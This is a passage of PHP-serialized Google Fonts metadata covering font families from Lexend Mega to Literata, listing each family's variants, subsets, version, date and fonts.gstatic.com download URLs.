96:\"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDL8fmvveyiq9EqQw.ttf\";s:3:\"500\";s:96:\"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDLw_mvveyiq9EqQw.ttf\";s:3:\"600\";s:96:\"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDLL_6vveyiq9EqQw.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDLFv6vveyiq9EqQw.ttf\";s:3:\"800\";s:96:\"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDLcf6vveyiq9EqQw.ttf\";s:3:\"900\";s:96:\"http://fonts.gstatic.com/s/lexendmega/v24/qFdX35aBi5JtHD41zSTFEuTByuvYFuE9IbDLWP6vveyiq9EqQw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:654;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Lexend Peta\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:96:\"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgR6SFyW1YuRTsnfw.ttf\";s:3:\"200\";s:96:\"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgRaSByW1YuRTsnfw.ttf\";s:3:\"300\";s:96:\"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgRtyByW1YuRTsnfw.ttf\";s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgR6SByW1YuRTsnfw.ttf\";s:3:\"500\";s:96:\"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgR2yByW1YuRTsnfw.ttf\";s:3:\"600\";s:96:\"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgRNydyW1YuRTsnfw.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgRDidyW1YuRTsnfw.ttf\";s:3:\"800\";s:96:\"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgRaSdyW1YuRTsnfw.ttf\";s:3:\"900\";s:96:\"http://fonts.gstatic.com/s/lexendpeta/v24/BXR4vFPGjeLPh0kCfI4OkFX-UTQHSCaxvBgRQCdyW1YuRTsnfw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:655;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Lexend Tera\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:96:\"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiM5zITdpz0fYxcrQ.ttf\";s:3:\"200\";s:96:\"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiMZzMTdpz0fYxcrQ.ttf\";s:3:\"300\";s:96:\"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiMuTMTdpz0fYxcrQ.ttf\";s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiM5zMTdpz0fYxcrQ.ttf\";s:3:\"500\";s:96:\"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiM1TMTdpz0fYxcrQ.ttf\";s:3:\"600\";s:96:\"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiMOTQTdpz0fYxcrQ.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiMADQTdpz0fYxcrQ.ttf\";s:3:\"800\";s:96:\"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiMZzQTdpz0fYxcrQ.ttf\";s:3:\"900\";s:96:\"http://fonts.gstatic.com/s/lexendtera/v24/RrQDbo98_jt_IXnBPwCWtYJLZ3P4hnaGKFiMTjQTdpz0fYxcrQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:656;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Lexend Zetta\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v24\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:98:\"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCy9bH0z5jbs8qbts.ttf\";s:3:\"200\";s:98:\"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCy1bG0z5jbs8qbts.ttf\";s:3:\"300\";s:98:\"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCy4jG0z5jbs8qbts.ttf\";s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCy9bG0z5jbs8qbts.ttf\";s:3:\"500\";s:98:\"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCy-TG0z5jbs8qbts.ttf\";s:3:\"600\";s:98:\"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCywjB0z5jbs8qbts.ttf\";s:3:\"700\";s:98:\"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCyzHB0z5jbs8qbts.ttf\";s:3:\"800\";s:98:\"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCy1bB0z5jbs8qbts.ttf\";s:3:\"900\";s:98:\"http://fonts.gstatic.com/s/lexendzetta/v24/ll8uK2KYXje7CdOFnEWcU8synQbuVYjYB3BCy3_B0z5jbs8qbts.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:657;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Libre Barcode 128\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/librebarcode128/v26/cIfnMbdUsUoiW3O_hVviCwVjuLtXeJ_A_gMk0izH.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:658;O:8:\"stdClass\":8:{s:6:\"family\";s:22:\"Libre Barcode 128 Text\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:102:\"http://fonts.gstatic.com/s/librebarcode128text/v26/fdNv9tubt3ZEnz1Gu3I4-zppwZ9CWZ16Z0w5cV3Y6M90w4k.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:659;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Libre Barcode 39\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:89:\"http://fonts.gstatic.com/s/librebarcode39/v19/-nFnOHM08vwC6h8Li1eQnP_AHzI2K_d709jy92k.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:660;O:8:\"stdClass\":8:{s:6:\"family\";s:25:\"Libre Barcode 39 Extended\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:109:\"http://fonts.gstatic.com/s/librebarcode39extended/v25/8At7Gt6_O5yNS0-K4Nf5U922qSzhJ3dUdfJpwNUgfNRCOZ1GOBw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:661;O:8:\"stdClass\":8:{s:6:\"family\";s:30:\"Libre Barcode 39 Extended Text\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v25\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:120:\"http://fonts.gstatic.com/s/librebarcode39extendedtext/v25/eLG1P_rwIgOiDA7yrs9LoKaYRVLQ1YldrrOnnL7xPO4jNP68fLIiPopNNA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:662;O:8:\"stdClass\":8:{s:6:\"family\";s:21:\"Libre Barcode 39 Text\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v26\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:100:\"http://fonts.gstatic.com/s/librebarcode39text/v26/sJoa3KhViNKANw_E3LwoDXvs5Un0HQ1vT-031RRL-9rYaw.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:663;O:8:\"stdClass\":8:{s:6:\"family\";s:24:\"Libre Barcode EAN13 Text\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:107:\"http://fonts.gstatic.com/s/librebarcodeean13text/v19/wlpigxXFDU1_oCu9nfZytgIqSG0XRcJm_OQiB96PAGEki52WfA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:664;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Libre Baskerville\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:92:\"http://fonts.gstatic.com/s/librebaskerville/v14/kmKnZrc3Hgbbcjq75U4uslyuy4kn0pNeYRI4CN2V.ttf\";s:6:\"italic\";s:95:\"http://fonts.gstatic.com/s/librebaskerville/v14/kmKhZrc3Hgbbcjq75U4uslyuy4kn0qNcaxYaDc2V2ro.ttf\";s:3:\"700\";s:96:\"http://fonts.gstatic.com/s/librebaskerville/v14/kmKiZrc3Hgbbcjq75U4uslyuy4kn0qviTjYwI8Gcw6Oi.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:665;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Libre Bodoni\";s:8:\"variants\";a:8:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"600\";i:3;s:3:\"700\";i:4;s:6:\"italic\";i:5;s:9:\"500italic\";i:6;s:9:\"600italic\";i:7;s:9:\"700italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":8:{s:7:\"regular\";s:97:\"http://fonts.gstatic.com/s/librebodoni/v3/_Xm--H45qDWDYULr5OfyZudXzSBgY2oMBGte6I1fwWzZcOb3U3s.ttf\";s:3:\"500\";s:97:\"http://fonts.gstatic.com/s/librebodoni/v3/_Xm--H45qDWDYULr5OfyZudXzSBgY2oMBGte6L9fwWzZcOb3U3s.ttf\";s:3:\"600\";s:97:\"http://fonts.gstatic.com/s/librebodoni/v3/_Xm--H45qDWDYULr5OfyZudXzSBgY2oMBGte6FNYwWzZcOb3U3s.ttf\";s:3:\"700\";s:97:\"http://fonts.gstatic.com/s/librebodoni/v3/_Xm--H45qDWDYULr5OfyZudXzSBgY2oMBGte6GpYwWzZcOb3U3s.ttf\";s:6:\"italic\";s:100:\"http://fonts.gstatic.com/s/librebodoni/v3/_Xm4-H45qDWDYULr5OfyZud9xBKfuwNnnsVZ_UUcKS_TdMTyQ3syLg.ttf\";s:9:\"500italic\";s:100:\"http://fonts.gstatic.com/s/librebodoni/v3/_Xm4-H45qDWDYULr5OfyZud9xBKfuwNnnsVZ_UUcGy_TdMTyQ3syLg.ttf\";s:9:\"600italic\";s:100:\"http://fonts.gstatic.com/s/librebodoni/v3/_Xm4-H45qDWDYULr5OfyZud9xBKfuwNnnsVZ_UUc9yjTdMTyQ3syLg.ttf\";s:9:\"700italic\";s:100:\"http://fonts.gstatic.com/s/librebodoni/v3/_Xm4-H45qDWDYULr5OfyZud9xBKfuwNnnsVZ_UUczijTdMTyQ3syLg.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:666;O:8:\"stdClass\":8:{s:6:\"family\";s:20:\"Libre Caslon Display\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:98:\"http://fonts.gstatic.com/s/librecaslondisplay/v14/TuGOUUFxWphYQ6YI6q9Xp61FQzxDRKmzr2lRdRhtCC4d.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:667;O:8:\"stdClass\":8:{s:6:\"family\";s:17:\"Libre Caslon Text\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/librecaslontext/v3/DdT878IGsGw1aF1JU10PUbTvNNaDMcq_3eNrHgO1.ttf\";s:6:\"italic\";s:93:\"http://fonts.gstatic.com/s/librecaslontext/v3/DdT678IGsGw1aF1JU10PUbTvNNaDMfq91-dJGxO1q9o.ttf\";s:3:\"700\";s:94:\"http://fonts.gstatic.com/s/librecaslontext/v3/DdT578IGsGw1aF1JU10PUbTvNNaDMfID8sdjNR-8ssPt.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:668;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Libre Franklin\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:103:\"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhLsSUB9rIb-JH1g.ttf\";s:3:\"200\";s:103:\"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhrsWUB9rIb-JH1g.ttf\";s:3:\"300\";s:103:\"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhcMWUB9rIb-JH1g.ttf\";s:7:\"regular\";s:103:\"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhLsWUB9rIb-JH1g.ttf\";s:3:\"500\";s:103:\"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhHMWUB9rIb-JH1g.ttf\";s:3:\"600\";s:103:\"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduh8MKUB9rIb-JH1g.ttf\";s:3:\"700\";s:103:\"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhycKUB9rIb-JH1g.ttf\";s:3:\"800\";s:103:\"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhrsKUB9rIb-JH1g.ttf\";s:3:\"900\";s:103:\"http://fonts.gstatic.com/s/librefranklin/v13/jizOREVItHgc8qDIbSTKq4XkRg8T88bjFuXOnduhh8KUB9rIb-JH1g.ttf\";s:9:\"100italic\";s:105:\"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oZ8RdDMTedX1sGE.ttf\";s:9:\"200italic\";s:105:\"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05ob8RNDMTedX1sGE.ttf\";s:9:\"300italic\";s:105:\"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oYiRNDMTedX1sGE.ttf\";s:6:\"italic\";s:105:\"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oZ8RNDMTedX1sGE.ttf\";s:9:\"500italic\";s:105:\"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oZORNDMTedX1sGE.ttf\";s:9:\"600italic\";s:105:\"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oaiQ9DMTedX1sGE.ttf\";s:9:\"700italic\";s:105:\"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05oabQ9DMTedX1sGE.ttf\";s:9:\"800italic\";s:105:\"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05ob8Q9DMTedX1sGE.ttf\";s:9:\"900italic\";s:105:\"http://fonts.gstatic.com/s/librefranklin/v13/jizMREVItHgc8qDIbSTKq4XkRiUawTk7f45UM9y05obVQ9DMTedX1sGE.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:669;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Licorice\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:71:\"http://fonts.gstatic.com/s/licorice/v3/t5tjIR8TMomTCAyjNk23hqLgzCHu.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:670;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Life Savers\";s:8:\"variants\";a:3:{i:0;s:7:\"regular\";i:1;s:3:\"700\";i:2;s:3:\"800\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":3:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/lifesavers/v18/ZXuie1UftKKabUQMgxAal_lrFgpbuNvB.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/lifesavers/v18/ZXu_e1UftKKabUQMgxAal8HXOS5Tk8fIpPRW.ttf\";s:3:\"800\";s:82:\"http://fonts.gstatic.com/s/lifesavers/v18/ZXu_e1UftKKabUQMgxAal8HLOi5Tk8fIpPRW.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:671;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Lilita One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/lilitaone/v13/i7dPIFZ9Zz-WBtRtedDbUEZ2RFq7AwU.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:672;O:8:\"stdClass\":8:{s:6:\"family\";s:15:\"Lily Script One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:87:\"http://fonts.gstatic.com/s/lilyscriptone/v15/LhW9MV7ZMfIPdMxeBjBvFN8SXLS4gsSjQNsRMg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:673;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Limelight\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:75:\"http://fonts.gstatic.com/s/limelight/v16/XLYkIZL7aopJVbZJHDuYPeNGrnY2TA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:674;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Linden Hill\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-26\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/lindenhill/v22/-F61fjxoKSg9Yc3hZgO8ygFI7CwC009k.ttf\";s:6:\"italic\";s:81:\"http://fonts.gstatic.com/s/lindenhill/v22/-F63fjxoKSg9Yc3hZgO8yjFK5igg1l9kn-s.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:675;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Literata\";s:8:\"variants\";a:16:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"600\";i:5;s:3:\"700\";i:6;s:3:\"800\";i:7;s:3:\"900\";i:8;s:9:\"200italic\";i:9;s:9:\"300italic\";i:10;s:6:\"italic\";i:11;s:9:\"500italic\";i:12;s:9:\"600italic\";i:13;s:9:\"700italic\";i:14;s:9:\"800italic\";i:15;s:9:\"900italic\";}s:7:\"subsets\";a:7:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";i:6;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v30\";s:12:\"lastModified\";s:10:\"2022-07-12\";s:5:\"files\";O:8:\"stdClass\":16:{s:3:\"200\";s:107:\"http://fonts.gstatic.com/s/literata/v30/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbJG_F_bcTWCWp8g.ttf\";s:3:\"300\";s:107:\"http://fonts.gstatic.com/s/literata/v30/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbE-_F_bcTWCWp8g.ttf\";s:7:\"regular\";s:107:\"http://fonts.gstatic.com/s/literata/v30/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbBG_F_bcTWCWp8g.ttf\";s:3:\"500\";s:107:\"http://fonts.gstatic.com/s/literata/v30/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbCO_F_bcTWCWp8g.ttf\";s:3:\"600\";s:107:\"http://fonts.gstatic.com/s/literata/v30/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbM-4F_bcTWCWp8g.ttf\";s:3:\"700\";s:107:\"http://fonts.gstatic.com/s/literata/v30/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbPa4F_bcTWCWp8g.ttf\";s:3:\"800\";s:107:\"http://fonts.gstatic.com/s/literata/v30/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbJG4F_bcTWCWp8g.ttf\";s:3:\"900\";s:107:\"http://fonts.gstatic.com/s/literata/v30/or3PQ6P12-iJxAIgLa78DkrbXsDgk0oVDaDPYLanFLHpPf2TbLi4F_bcTWCWp8g.ttf\";s:9:\"200italic\";s:110:\"http://fonts.gstatic.com/s/literata/v30/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8f7XWSUKTt8iVow.ttf\";s:9:\"300italic\";s:110:\"http://fonts.gstatic.com/s/literata/v30/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8obXWSUKTt8iVow.ttf\";s:6:\"italic\";s:110:\"http://fonts.gstatic.com/s/literata/v30/or3NQ6P12-iJxAIgLYT1PLs1Zd0nfUwAbeGVKoRYzNiCp1OUedn8_7XWSUKTt8iVow.ttf\";s:9:\"500italic\";s:110:\"http://fonts.gstatic.com/s/literata/v30/or3NQ6P12-iJxAIgLYT1PLs1Zd0n